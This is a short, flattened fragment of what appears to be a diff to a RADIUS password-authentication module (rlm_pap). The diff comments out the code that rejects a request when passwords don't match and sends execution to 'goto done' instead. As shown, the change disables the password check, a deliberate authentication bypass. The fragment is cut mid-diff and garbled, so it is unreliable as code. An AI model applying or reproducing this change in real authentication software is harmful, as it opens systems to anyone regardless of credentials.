*/ + make_msg: + /* DEBUG("rlm_pap: Passwords don't match"); module_fmsg_vp = pairmake("Module-Failure-Message", module_fmsg, T_OP_EQ); pairadd(&request->packet->vps, module_fmsg_vp); return RLM_MODULE_REJECT; } + */ goto done; break;